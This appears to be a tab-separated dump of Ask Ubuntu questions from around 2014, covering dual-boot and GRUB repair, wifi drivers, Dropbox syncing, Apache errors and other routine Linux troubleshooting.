libgpod-common libgpod4 libgraphite2-2.0.0 libgrilo-0.1-0 libgtk-vnc-2.0-0 libgupnp-av-1.0-2 libgupnp-dlna-1.0-2 libgvnc-1.0-0 libhsqldb-java libhyphen0 libicc2 libicu4j-java libimdi0 libjaxp1.3-java libjline-java libjtidy-java liblinear-tools liblinear1 liblouis-data liblouis2 liblucene2-java libmagick++5 libminiupnpc5 libmozjs24d libmtp-common libmtp-runtime libmtp9 libmythes-1.2-0 libnatpmp1 libplot2c2 libpstoedit0c2a libraw5 libregexp-java libreoffice libreoffice-base libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-evolution libreoffice-filter-binfilter libreoffice-filter-mobiledev libreoffice-gnome libreoffice-gtk libreoffice-help-en-us libreoffice-impress libreoffice-java-common libreoffice-math libreoffice-report-builder-bin libreoffice-style-galaxy libreoffice-style-tango libreoffice-writer librhythmbox-core6 libservlet2.5-java libsofia-sip-ua-glib3 libsofia-sip-ua0 libsonic0 libspeechd2 libstlport4.6ldbl libsvm-tools libtelepathy-farstream2 libunique-3.0-0 libvisio-0.0-0 libwnck-common libwnck22 libwpd-0.9-9 libwpg-0.2-2 libwps-0.2-2 libxalan2-java libxerces2-java libxml-commons-external-java libxml-commons-resolver1.1-java libxss1 libxz-java lightsoff lp-solve mahjongg media-player-info minissdpd mobile-broadband-provider-info mythes-en-us nautilus-sendto-empathy network-manager-gnome nmap openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib p7zip-full perlmagick pstoedit python-brlapi python-gconf python-gnome2 python-louis python-mako python-markupsafe python-pyatspi python-pyatspi2 python-pyorbit python-speechd python-uno python-wnck python-zeitgeist quadrapassel rdesktop rhythmbox rhythmbox-data rhythmbox-plugin-cdrecorder rhythmbox-plugins rygel rygel-playbin rygel-preferences rygel-tracker seahorse shotwell shotwell-common simple-scan sound-juicer sound-theme-freedesktop speech-dispatcher swell-foop task-desktop telepathy-gabble telepathy-idle telepathy-logger telepathy-rakia telepathy-salut transmission-common transmission-gtk ttf-liberation ttf-sil-gentium-basic tzdata-java uno-libs3 unoconv ure vinagre vino x11-apps x11-session-utils x11-xfs-utils xbrlapi xdg-user-dirs-gtk xfonts-mathml xinit xorg xulrunner-24.0 zeitgeist-core use 'apt-get autoremove ' to remove them . it is a fresh install .
521382	windows 8.1 bootloader gone from grub . how do i get it back ?	i 'm a noob here . i stupidly hibernated my ubuntu and did not realize that problems will occur if you have 2 oss hibernating . did n't know windows 8 does some kind of shutdown/hibernate . anyway i have tried to use sudo update-grub in both current boot and on liveusb , and that does n't work . i also tried going into disk and turning off the hibernation on the win8 partition , that did n't work . how could i fix this problem ? i can access the partition ( in ubuntu ) with win8 in it still . -thanks ! ! !
521384	want to switch from ubuntu 14.04 to windows7 using usb	i was using windows7 and installed ubuntu 13.04 which became the only os of my laptop . now i want to reinstall windows7 again.i am unable to do so . please help
521387	wifi is not working with ubuntu 14.4	i just installed ubuntu 14.4 instead of windows ( now this is the only os on my laptop ) i have broadcom bcm9506 card . how can i fix this ? i already looked at a lot of similar questions but non of them help me . lspci -vnn | grep network 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) thanks
521388	native flac .cue splitter	i have some .flac albums i ripped as one big file to save somes space ( lossless cd rips are roughly 500mb each ) , now i have more storage i would like to split them back to there original files . is there a native flac .cue splitter for debian based systems ? i found some information but it is either old , just for mp3 or using wine , this is not what i want . also i found a nautilus script but i do n't think this will be lossless , also it only performs a very specific task and i would like some customization options , http : //ubuntuforums.org/showthread.php ? t=853794 so can anyone provide a lossless flac .cue splitter with native support , and a lot of conversion options ? no wine here is a windows app like what i need http : //www.medieval.it/cuesplitter-pc/menu-id-71.html thanks
521391	help recover windows hibernation after dual-booting	i dual-booted windows 8.1 and ubuntu 14.04 as guided at : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) . for dual booting , i had to removed the hibernation file in windows using powercfg.exe -h off as mentioned in the guide so i can no more hibernate windows 8.1 . now , i need to hibernate windows 8.1 without losing the dualboot . 1.is there any windows 8.1 software that help recreate hibernation file ? or 2.. any other way i can hibernate windows 8.1 ?
521393	boot error : stopping system v runlevel compatibility and checking battery state	i 'm running openfoam froam an ubuntu pendrive . one day it stopped booting with this error message : stopping system v runlevel compatibility . the next times i tried to boot it stucks at `` checking battery state '' . i 'm running from a desktop pc and i have important data on this pendrive . it 's the first time i use linux and i 'm noob about that . thanks for your time .
521394	immediately lock screen when i close laptop lid under gnome 3 ( 14.04 )	how can i configure my ubuntu 14.04 , logging in using gnome 3 , to lock the screen when i close my laptop lid ? all settings âş power only offers do nothing or suspend as options when i close the lid . all settings âş brightness & lock is configured with lock on , lock screen after screen turns off . it does n't seem to work . i 've tried editing /etc/systemd/logind.conf to set handlelidswitch=lock and rebooting ; nothing changed .
521395	configuration editor does not show active plugins under screen0	i have ubuntu 14.x installed in my system and use expo and scale plugins with their edge bindings extensively . earlier i used to use configuration manager to set their place last in the list of active plugins so that they can work properly . but now from few days before , they have stopped working and when i visit configurationmanager- > apps- > compiz-1- > general- > screen0 and click on options , the list is presented in the right hand side does not contain option active-plugins . any help will be appreciated .
521398	bash error on opening the terminal	whenever i open terminal in ubuntu i get the following bash and i do n't know how to solve it . i need a solution as soon as possible : bash : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : syntax error : operand expected ( error token is `` /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games '' ) bash : /home/kaustubh/.bashrc : line 6 : unexpected eof while looking for matching ` } ' bash : /home/kaustubh/.bashrc : line 118 : syntax error : unexpected end of file
521401	lagging while typing	i am using ubuntu 14.04 . but unexpectedly , i am facing a problem that while typing a lagging occurs . can anybody tell me the cause and a way to solve this problem out ? thanks
521403	how to format a hdd in ubuntu 14.04	so i recently switched to ubuntu from opensuse , and i 'm loving it . there 's one problem though . i 've found that the control centre is minimalistic ( to say the least ) and , coming from a guy with yast2 , that 's a bit of a problem . my particular problem here is that i 'm trying to reformat an old hdd to an ntfs file extension , and i 'm not exactly sure how . i 'd prefer it if this is gui driven , a , while i certainly am confident with a terminal , i do n't like the idea of using it to reformat an hdd . now , not only do i want to reformat , i 'd also like to partition it . i.e : 700gb nfts and 500gb whatever extension ubuntu uses .
521405	setup default directory for ftp user and not to allow him to access the parent directories	i have setup an ubuntu instance on amazon aws with nginx webserver installed on it . i would like to create an ftp user and give default access to /usr/share/nginx/www . the user should n't be able to navigate back to the parent folders once he gains access to www . a step wise solution starting from user creation would be more helpful .
521409	dual boot problems : ca n't boot windows after using easybcd	quite new at this , so any help would be appreciate . i 've spent a load of time researching and have n't found a good answer so i 'm asking here . basic problem : i tried to install ubuntu 14.04 on my hp pavilion 14 sleekbook to dual boot along side windows . i had tried this a year earlier ( actually it was 12.04 ) and got it working ( i think i used easybcd but honestly ca n't remember ) but at some point ubuntu stopped booting and i was too busy to mess with it . i followed instructions for getting rid of ubuntu and it seemed to work but whenever i turned on my machine the windows boot loader would offer me ubuntu or windows . i ignored it and went about my business . so the other day with some time on my hands , i decided to install ubuntu 14.04 from a usb . everything seem to go fine , but when i could n't boot into ubuntu . thinking i could fix any issues associated with the last go around i used the reset function on easybcd and afterwards created ( i thought ! ) a new slot for windows , figuring i would make sure that works before moving onto ubuntu . well , it did n't . when i reset the computer it immediately goes to a blank screen with an occasional flicker in the beginning . windows wo n't boot . eventually i figured out that if i press f10 in the very start it gives me the option of loading windows 8 or configuration . if i hit windows 8 it goes back to the blank screen . if i hit esc it gives me a list of boot options which include ubuntu and my usb , but not windows . i can also access the bios and boot options . ubuntu seems to boot fine and i am happily using it , but i would really like to get my windows boot back and the files stuck on that partition . i ran boot-repair in ubuntu and there are no changes to behavior . here is the url http : //paste.ubuntu.com/8284130 from boot-repair . i should also note that windows came pre-installed and there was no system restore disc ( there is also no dvd drive ) . is it possible , if necessary , to create one on a usb ? what can i do ? thanks !
521410	dropbox syncing never finishes	when i connect to dropbox , it starts syncing the files , but never finishes . `` dropbox status '' says : `` uploading 802 files ... downloading file list ... '' and this remains like this forever . i tried `` dropbox stop '' and `` dropbox start '' but it did n't work . how can i make my dropbox sync again ?
521411	saving to hard disk or usb results in corrupted pdf files	bit of a newbie to ubuntu/linux , but have be using and enjoying , maybe actually loving , for a year . however , i recently attempted to access a whole load of files , some of which were saved to a hard disk , and others to a usb stick . the hard disk already had a previous owner whereas the usb was setup and is still owned by the same user and group as the ubuntu machine . as far as i can tell , all the pdf files that i 've saved using the ubuntu machine can not be opened , with the error message being that the files are corrupted . i can not open them on a mac machine either . have tested saving and opening again , and found that whilst the usb remained connected i could open them fine , but as soon as i disconnected the usb and then re-inserted , the error message was received when trying to open the pdf . i am also concerned that i may be unable to even see some files previously saved , although i can not be sure of this as i may have mislaid them in some way . any advice on what i 'm doing wrong would be greatly appreciated !
521414	help for installation	details : apport apport-gtk apt apt-transport-https apt-utils apt-xapian-index bind9-host brasero brasero-cdrkit brasero-common checkbox checkbox-qt cups cups-bsd cups-client cups-common cups-ppdc dnsutils duplicity firefox firefox-globalmenu firefox-locale-en flashplugin-installer gimp gimp-data gir1.2-gnomebluetooth-1.0 gnome-bluetooth gnome-keyring gnome-terminal gnome-terminal-data gnupg gpgv hpijs hplip hplip-data icedtea-7-jre-jamvm ifupdown imagemagick imagemagick-common initramfs-tools initramfs-tools-bin iproute landscape-client-ui-install language-selector-common language-selector-gnome libapt-inst1.5 libapt-pkg4.12 libasn1-8-heimdal libaudio2 libbind9-80 libbrasero-media3-1 libc-bin libc-dev-bin libc6 libc6-dev libcups2 libcupscgi1 libcupsimage2 libcupsmime1 libcupsppdc1 libcurl3 libcurl3-gnutls libcurl3-nss libdns81 libdrm-intel1 libdrm-nouveau1a libdrm-nouveau2 libdrm-radeon1 libdrm2 libdvdread4 libgimp2.0 libgnome-bluetooth11 libgnutls26 libgssapi3-heimdal libhcrypto4-heimdal libheimbase1-heimdal libheimntlm0-heimdal libhpmud0 libhx509-5-heimdal libicu48 libisc83 libisccc80 libisccfg82 libjpeg-turbo8 libjpeg-turbo8-dev libkms1 libkrb5-26-heimdal liblwres80 libmagickcore5 libmagickcore5-extra libmagickwand5 libmysqlclient18 libnspr4 libnspr4-0d libnss3 libnss3-1d libp11-kit-gnome-keyring libpam-gnome-keyring libperl5.14 libpixman-1-0 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libpq5 libprocps0 libpurple-bin libpurple0 libpython2.7 libpython3.2 libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-opengl libqt4-qt3support libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libraw5 libroken18-heimdal libruby1.9.1 libsane-hpaio libsmbclient libssl1.0.0 libwbclient0 libwind0-heimdal libxfont1 libyaml-0-2 linux-image-3.5.0-45-generic linux-image-extra-3.5.0-45-generic linux-image-generic linux-libc-dev multiarch-support mysql-common openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib openssl perl perl-base perl-modules pm-utils policykit-1 printer-driver-hpcups printer-driver-hpijs printer-driver-postscript-hp procps python-apport python-httplib2 python-openssl python-problem-report python2.7 python2.7-minimal python3-apport python3-distupgrade python3-httplib2 python3-problem-report python3-software-properties python3-update-manager python3.2 python3.2-minimal qdbus rsyslog rtkit ruby1.9.1 samba-common samba-common-bin sessioninstaller smbclient software-properties-common software-properties-gtk thunderbird thunderbird-globalmenu thunderbird-gnome-support tzdata tzdata-java ubuntu-release-upgrader-core ubuntu-release-upgrader-gtk ubuntu-system-service unzip update-manager update-manager-core usb-creator-common usb-creator-gtk vino xserver-common xserver-xorg-core xserver-xorg-video-intel xserver-xorg-video-nouveau anybody can help me ?
521415	list all kernel settings	how can i find out with which settings my kernel was compiled ? i want to find out which which wifi module my kernel is running because it is my wireless card unstable on lenovo yoga 2 pro i tried : make menuconfig but this just shows : make : *** no rule to make target `menuconfig ' . stop . or can i find out the module with sysctl ? this is the output of sysctl -a
521416	videos not resume from last position	my default ubuntu player `` videos '' ( totem ) does n't resume from last position . the settings in preferences called `` start playing files from last position '' is already checked yet it always starts all the movies from beginning . what should i do ? note : ubuntu 14.04 system fully updated ( till today ) i have tried searching in askubuntu regarding this problem but all i could get were : vlc last position last position only for video
521419	ubuntu 14.04 lts install issues	the first thing i have done ( before posting this questions , was read the guide located on askubuntu . this was a very detailed guide , and now that i have ubuntu 14.04 , i will try this again . specifications laptop model : toshiba satellite u50d- stock . specs are at this page . current install ( attempt ) : ubuntu 14.0.1 lts ( amd64 ) iso , mounted to usb via lili error message : reboot and select proper boot device , or insert boot media in selected boot device and press a key my file system { refer to notes } before i give the details , i will say this- ubtuntu decided the drive structure automatically , as i do not have a firm understanding of what it should be . i have attempted to re-do the grub and bootloader , and manually mount the drives . this is noted below /dev/sda free space : mb /dev/sda1 efi 536mb ( free ) 33mb ( used ) /dev/sda2 ext4 741638mb ( free ) 15800mb ( used ) ubuntu 14.04.1 lts /dev/sda3 swap 7978 mb ( free ) free space my attempt to boot repair i have tried installing ubuntu on multiple attempts . i have installed via usb and wiped windows completely . i have then also tried the option of 'try ubuntu without installing ' and then installing . on both methods , the ubuntu installer has recognized the previous install , and i have overwritten it . once all has installed , it prompts for a reboot..where it gets the above error message . just to clarify- i have not been able to boot directly to ubuntu , and there is currently no os other than ubuntu 14.04 on this laptop . the first instance , i installed a grub repair program and went with that . the guide in which i followed is hosted on the community . you can view this here . as per the instructions , the first command ( s ) i ran were as follows : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo sed 's/trusty/saucy/g ' -i /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) this went through the terminal with no issue . once it completed , it recommended i run the following commands : sudo chroot `` /mnt/boot-sav/sda2 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sda2 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sda2 '' apt-get purge -y -- force-yes grub* shim-signed linux-signed* upon completion , i rebooted and all was the same- no luck ! repair grub2 so with the above not working , i tried the next guide . now , this one i was not so sure on . because i had booted from the usb , i decided to add an admin account for myself- what was the harm ? i was not too certain on this one , so point out any mistakes please ! sudo mount /dev/sda2 /mnt there were no errors , prompts etc . so i assume when you mount there is no confirmation etc . i then ran the following commands : sudo mount -- bind /dev /mnt/dev & & sudo mount -- bind /dev/pts /mnt/dev/pts & & sudo mount -- bind /proc /mnt/proc & & sudo mount -- bind /sys /mnt/sys once again , nothing happened- which is what i expected . i then ran the next command : sudo chroot /mnt now that i was done , i went with the next command of : grub-install /dev/sda this is where i ran into the following errors : e : failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/g/grub/grub_0.97-29ubuntu66_amd64.deb could not resolve 'au.archive.ubuntu.com' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i am not sure if an error of the file no longer exists , or is outdated etc . in this instance i did what any idiot does . i improvised . sudo apt-get install grub or apt-get install grub when that spat out errors , i reverted to an update : sudo apt-get update no help . for those interested , the terminal reads this : root @ ubuntu : / # apt-get install grub reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : efibootmgr secureboot-db shim use 'apt-get autoremove ' to remove them . the following extra packages will be installed : grub-common suggested packages : grub-legacy-doc mdadm multiboot-doc grub-emu xorriso desktop-base the following new packages will be installed : grub grub-common 0 upgraded , 2 newly installed , 0 to remove and 103 not upgraded . need to get 2,593 kb of archives . after this operation , 14.0 mb of additional disk space will be used . do you want to continue ? [ y/n ] i was then unable to perform the next step , which is : exit & & sudo umount /mnt/sys & & sudo umount /mnt/proc & & sudo umount /mnt/dev/pts & & sudo umount /mnt/dev & & sudo umount /mnt with that , i decided to revert back to my system file stricture . the next step ... i have looked around for a simple guide on how a file-structure should be , and attempted this guide . as per the instructions , the first step was to do . this was fun.. sudo lshw -c disk the logical name of my drive is/dev/sda . awesome , now i follow this up . unfortunately i could not find the disk utility ( yo , askubuntu- 10 points for n00b ) . i went into the next available option ... the terminal ! i start fdisk with the following : sudo fdisk /dev/sda then enter 'm ' for menu , 'n ' for new and followed the details . the new partition was made , so then i formatted with : sudo mkfs -t ext3 /dec/sdb1 i read , then re-read the guide and no luck..no boot device . frustrated , i tried check disk for defects . apparently all good . i am greatly exceeded my knowledge of ubuntu/linux .
521422	two ubuntu 14.04 operating systems along with windows 7	i have some really serious issue with my laptop . this is regarding the ubuntu 14.04 operation system . presently , i have installed two ubuntu 14.04 's along side windows 7. so , please can anyone tell me how to delete/remove one of the ubuntu 14.04 ? ?
521423	how can i disable alt+click window dragging ?	in ubuntu 14.04 , when you hold alt and click a window , you can drag it around . as i understand , you used to be able to disable it through gconf , but unity does n't read settings from here any more ( hence not being able to change where the window buttons are any more ) . there 's no setting for this by default , and i ca n't find anything in unity tweak tool either . is there anyway to disable alt+click window movement in 14.04 ?
521425	lubuntu won '' t boot from cd and i cant run wubi	lubunu boot disk wont boot . i am the administrator . i have resurched plenty . when i try to run wubi in xp error message `` only part of a readprocessmemory or writeprocessmemory request was completed. '' ... . need help please .
521427	virtualbox ubuntu share guest vpn with host	this might be convoluted , but bare with me . i need to connect to my work vpn , but my work uses juniper network-connect . i have a 64 bit ubuntu running 14.04 , but not a single one of the juniper tutorials have worked for me ( i 've been at this for close to a month ) . however , i have had success connecting to my work vpn by setting up a virtual-box guest with 32 bit lubuntu . now that i have my guest box correctly connecting to my work vpn , does anyone know how i can route my host traffic through my guest ?
521432	grub `` unknown filesystem '' boot-repair did n't find a solution	after booting my pc yesterday i encountered a boot-error and only the grub rescue prompt . error : unknown filesystem . after searching the internet i booted into the boot-repair and tried the standard option . boot-repair deleted grub successfully but installing it once again did n't work . ( saying something , that the necessary package could not be resolved for ubuntu 13.04 , sorry i 'm writing on my netbook , that 's why i 'm not having the proper error-message ) here is a pastebin of my yesterday 's rescue-attempt : http : //paste.ubuntu.com/8285134/ i am still using ubuntu 13.10 on that mashine . no dual-boot . before i encoutered the error i made a usb-startdisk for trying out ubuntu 14.04.01 on my netbook . maybe the problem is connected to that ? i 'm affraid of having a corrupted filesystem . because i could not mount the drive in a ubuntu 12.04 live-session from cd-rom . that would mean some data-loss for me 째-째 thanks for your help !
521434	how set the correct hour in ubuntu server ?	i have an incorrect time in my ubuntu server , i 'm using ubuntu server 14.04 when i run date command this is the result : lun 8 set 2014 , 08.28.03 , cest the correct hour is 10.40 .
521436	does nautilus cutting delete files during the process or only after it 's completed	i 've just lost about a few hours of progress when the ubuntu file manager decided to crash , as it does so often . i 've been moving over a terabyte of data from one disk to another , by cutting a folder containing many file , and pasting it to the destination . did the files that got copied also get deleted in the source disk ? or would they all be deleted only after the whole thing was copied ? how can i merge it all back if they got cut ?
521442	apache broke after upgrading	i tried to upgrade my php version with the help of this and somehow the apache version also upgraded . after this upgrade i got a lot of errors obviously and i managed to solve lots of them except this one apache2 : syntax error on line 210 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/authmysql.load : can not load /usr/lib/apache2/modules/modauthmysql.so into server : /usr/lib/apache2/modules/modauth_mysql.so : can not open shared object file : no such file or directory the module does n't exist as i checked . how can i solve this ? i tried to google all the way but i ca n't seem to find a correct answer . any help would be awesome : ) thanks in advance guys ! edit i think this problem occurs because of iredmail that depends on that module . could this be possible ?
521443	checking os details in ubuntu 14.04.1 lts	i have just installed ubuntu 14.04.1 lts in my computer . when i am triying to see the details about my system then it shows me ubuntu 14.04 lts instead of ubuntu 14.04.1 lts . why the details not shown `` ubuntu 14.04.1 lts '' ?
521445	how to make copies of a customised live usb stick ?	i have spent some time and effort customising a live usb setup of ubuntu 14.04 . i want to make copies of this environment , before it gets corrupted ( has happened once recently ) . i do n't want to image the entire drive because it is a 16gb drive with 2 partitions , only one has the live environment . is this the best way to go about it ? boot with live cd and copy entire partition containing the live usb files ( on the pendrive ) , and use dd to copy the boot sector ?
521449	which script actually does automatic suspend of machine ?	which particular script is activated upon inactivity of the system ? how does the script know that system has been inactive for the configured duration ? i need the script , so that i can check if someone has logged on via ssh , and prevent the script from actually suspending the machine .
521452	wubi freeze in the middle of dowload	i'am trying to download ubuntu 14.04 lts using wubi from the official site of ubuntu in the middle , it just stop downloading but still responsive but does n't make any progress . since i ca n't find solution on the internet i close it , and now it want to uninstall the previous installation progress is there a way to resume what i already download ? or can i download ubuntu 14.04 in torrent and link it in wubi ?
521454	live usb ubuntu on second partition	is it possible to put a live ubuntu installation on the second partition of a flash drive ? i have a flash drive with 2 partitions : the first one is ~10gb formatted fat32 for storing files on in windows . the second is ~5gb and i want to put a live ubuntu on it with a persistence file .
521455	twitter/ youtube app problems	so i 've been using the twitter and youtube applications from the software center ( because using them in firefox is sometime slow , in youtube 's case , and twitter keeps jumping back to the top when i post or reply to something ) but when i try and say , copy and paste a segment , it wont highlight or give me the right click options ; nor will it spell check . so i have to use firefox as well . the same problem occurs when i 'm using the youtube application , i cant copy and paste from the information , is there a terminal command that will remedy this problem ? `
521458	/host folder read only using gksu nautilus	i have ubuntu installed on xp with wubi . i sometimes used gksu nautilus to edit files in /host and move some files from my ubuntu folders to the /host folder . but now when i browse the /host folder using gksu nautilus it is read-only and the folder has a padlock on it . sometimes i can move one file before it reverts to read-only . can i make it read-write again ? best wishes
521460	not showing particular wireless access point ubuntu 14.04	i installed some updates and the next time i powered on , my particular wifi network is not showing up on the list ( but others are )
521462	i am installing android studio then get error unable to locate android studion	i had done it this way sudo apt-add-repository ppa : paolorotolo/android-studio sudo apt-get update i get this error : w : failed to fetch http : //ppa.launchpad.net/paolorotolo/android-studio/ubuntu/dists/raring/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/paolorotolo/android-studio/ubuntu/dists/raring/main/binary-i386/packages 404 not found 3 ) sudo apt-get install android-studio e : unable to locate package android-studio
521463	upgrade ubuntu lts to a version that supports macbook retina	i have ubuntu lts 14.04 with gnome 3 as gui installed on my macbook ( it 's a persent ) and some things don not work very well . like chromium is eye hurting small and my thunderbold interfaces do not work very well either . i know that for thunderbold support i would need at least kernel 3.14 but my current kernel is 3.13.something . i also know that for gnome to work with hidpi desktops it 'll need gnome 3.12 but 3.10 is installed . so my question is , what can i do to get newer software while beeing aware that it is not that tested and might break .
521465	how can i repeat the content of a file n times ?	i 'm trying to benchmark to compare two different ways of processing a file . i have a small amount of input data but in order to get good comparisons , i need to repeat the tests a number of times . rather than just repeating the tests i would like to duplicate the input data a number of times ( eg 1000 ) so a 3 line file becomes 3000 lines and i can run a much more fulfilling test . i 'm passing the input data in via a filename : mycommand input-data.txt
521468	can not access htdocs on tomcat cluster scenario which runs on apache	i have created tomcat cluster using apache and mod_jk module . load balancing working fine and i can access the webapp directory 's projects . but the problem is after i configured the cluster , now i can not access the htdocs projects . any solutions please help me .
521469	oh my zsh for the root and for all user	i have installed zsh and i am using oh my zsh plugins for easily everything works fine , but when i become a root user , it changes to the normal bash and sh what should i do to make the oh my zsh as the default zsh for all users including root i have tried using the chsh -s /bin/zsh root i got zsh but not oh_my_zsh and also cp the /home/user/.zshrc /root/.zshrc to get the oh_my_zsh but nothing worked ( i do n't need zsh but i need oh_my_zsh for all the user in the system )
521474	apps sometimes appear like all black windows	i 'm with the nvidia driver and had this problem in 13.10 as well as now in 14.04 sometimes when you switch to an opened app it pops up in all blacked out window . you have to resize or move between workspaces to make it show properly . i realize this is probably related to nvidia , but this been around for couple of years . i 'm now with the latest nvidia drivers and latest ubuntu , is there still no fix ? : (
521475	i would like to know how to dual boot ubuntu and windows 8.1	my pc custom built liguid cooled i7 with 8gb ddr3 128ssd and 3tb hard drive i have created a 500gb partition windows is installed on my 128 i am running windows 8.1 pro i have never used ubuntu and do n't want to mess up my system lol
521481	how can i use silverlight in chrome on ubuntu 14.04 lts ?	i have read all the askubuntu.com answers but i ca n't find any way to install it and work in chrome . it 's important because i need it for online tickets , games in facebook , and other silverlight websites . i have already used that : sudo add-apt-repository ppa : pipelight/stable sudo apt-get update sudo apt-get install pipelight-multi sudo pipelight-plugin -- enable silverlight but only activates it for firefox , and not for chrome ... is there any other command or any other program who i can do my job ? ? ?
521483	will upgrade from 12.04 to 14.04 work with lvm encryption ?	i have a laptop running 12.04 and the hd is encrypted with lvm . will the system boot if i upgrade to 14.04 ?
521485	how do i connect two remote servers	i 've been working with lans using ubuntu for some time now . so i have 2 office locations , each with their own ubuntu servers . now we need to link them and we have been provided with a leased line . in summary , each server works fine within their lan each network has its own internet connection ( not relevant i think ) each lan can ping the remote router . i.e. , office a allows to ping router a and vice versa . but i can not go beyond the router in the remote office . for example , from offcie a , i can ping the router of office b but not the server of that office . am i missing something ? please advise what needs to be done . each machine has a static ip . thanks !
521491	need a server to monitor the outflow of request	i am trying to open a small office , with the machine support of five . i would like to setup a proxy server to share the broadband connection in the âoffice and also to restrict the access to certain social media websites . how am i supposed to go about . kindly note that i can not have an extravagant expenditure as the financial resources are limited . an early reply would be very helpful .
521496	which application can mount or open the network shared directory ?	i am new to ubuntu and i do n't know how to open the network and which application can open the network locations ? actually i tried with the following steps on first time i was connected but after that my friend changed the default file opener and i do n't know what is the default application which can open the network locations ... 1 ) nautilus 2 ) network 3 ) my local networks pc . 4 ) login there you go ... but now what to do now ubuntu opens the location with the ubuntu software center ... .
521498	what to do when the system totally freezes ?	i 'm a new ubuntu ( 14.04 lts ) user and i 'm just trying to discover new aspects of this os , i encountered a problem ! sometime the whole system just freezes ( nothing works , keyboard , mouse , nothing at all ) so none of the solutions as holding alt+sysrq and reisub or alt+f2 is helpful in this case , first i would like to know the reason if anyone could help me with that ! and after i would like to know how to get the system back to life , so far the only thing i can do is pushing the power button and holding it to switch off the system , is there any other way , other than power button ? thanks a bunch in advance
521506	printer installation stalled	i 'm trying to install the drivers for my printer , i think i interrupted the installation first time round and now it just stalls and freezes up . also when i restart the computer it starts now in `` grub '' , i think , and is acting up . other than that its running fine . what should i do to clear the problem ?
521509	is there a benchmarking/monitoring tool that can be targetted towards running applications ?	i am trying to fix a performance issue bug on one of the core apps , and i would like to know if there is any benchmarking or monitoring tool that i can use to compare my different branches use of cpu . thanks .
521511	installing desktop in ubuntu 14.04 server	i installed ubuntu desktop and lubuntu desktop on ubuntu server like this : sudo apt-get install ubuntu-desktop but it did n't install basic programs like terminal and i dont see any applets on the topbar when new programs are installed ( like teamviewer ) , i also install virtual box but when i try to run by searching its not there.. totally confused . i would like to user this server as i would use a fully fledged ubuntu desktop . unfortunately reinstalling from scratch is not option for me right now .
521513	change location of /opt or /usr ? or other way to improve system portability and save ssd space	i have a 32 gb msata drive which i set to be the mountpoint of / . then i have a 500 gb drive which is set to be /home . i just did a clean install of ubuntu 14.04 ( but kept my home folder ) and noticed a few things . first of all , my msata went from having 29 gb full to only 4 gb . i had to re-install several applications from the software center and other repositories . i am thinking about how to keep my ssd from getting full as i install new software ( which tend to install in /opt or /usr ) . i believe i can use symbolic links , but was curious if that was the best way , or if i can truly mount them on the other drive . additionally are there ways to make some programs install in /home ? when i download scripts i have placed them in a ~/apps folder . the nice thing about this was these programs were preserved after the clean re-install , so i could get back to work faster .
521517	some kind of `` tearing '' ?	yesterday i experienced some kind of tearing on my rather new install of ubuntu 14.04 . still , i 've done some tweaking using the tweak-tool . well , yesterday some program was reported crashing , shortly before this weird tearing appeared for the first time . but now it happens again and again , especially when i use the startup disk creator to erase my pendrive before creating the startup disk . i do n't know what it is , but maybe you guys can help me out . currently , i have n't installed any drivers that are n't installed out of the box .
521519	is there a better match for the font arial than arial ?	unfortunately the arial font that is present in libreoffice ( which ships with ubuntu ) looks far off from the arial on a windows pc . is there a better match for it ?
521520	inverse of -- install-suggests option in apt-get remove	recently , i have installed a package with -- install-suggests and now i want to get rid of it . how do the opposite thing , remove package with all suggested packages ?
521521	`audit.conf` man page is missing	i have installed ubuntu 14.04 latest version , and when i do man audit.conf it returns no manual entry for audit.conf but i need it ...
521526	iptables service not started because of error ( svc_run_except )	i installed openvpn on my ubuntu server 12.04 . i followed this tutorial . i managed to install it and can access the admin panel through my browser . however , when i try to start the server , this error iptables service not started because of error ( svc_run_except ) appears . i googled for it and seen numerous post pertaining vz , and afaik my vpn hosting which is digitalocean is using kvm . so those does n't apply to me . i even followed this documentation on openvpn site , however , it seems that i do n't have this path /etc/vz/vz.conf which needs to be edited . i 'm totally lost in here and confused .
521528	blackscreen ubuntu 14.04	i had ubuntu 14.04 for a few month and it worked since this morning when i tried to log in and the screen was black . then i found this type in : sudo apt-get remove lightdm sudo apt-get install gdm sudo shutdown -r 0 on this site : http : //www.hackingtheperimeter.com/2014/05/ubuntu-1404-booting-up-to-black-screen.html but then i could not even see the log in page .
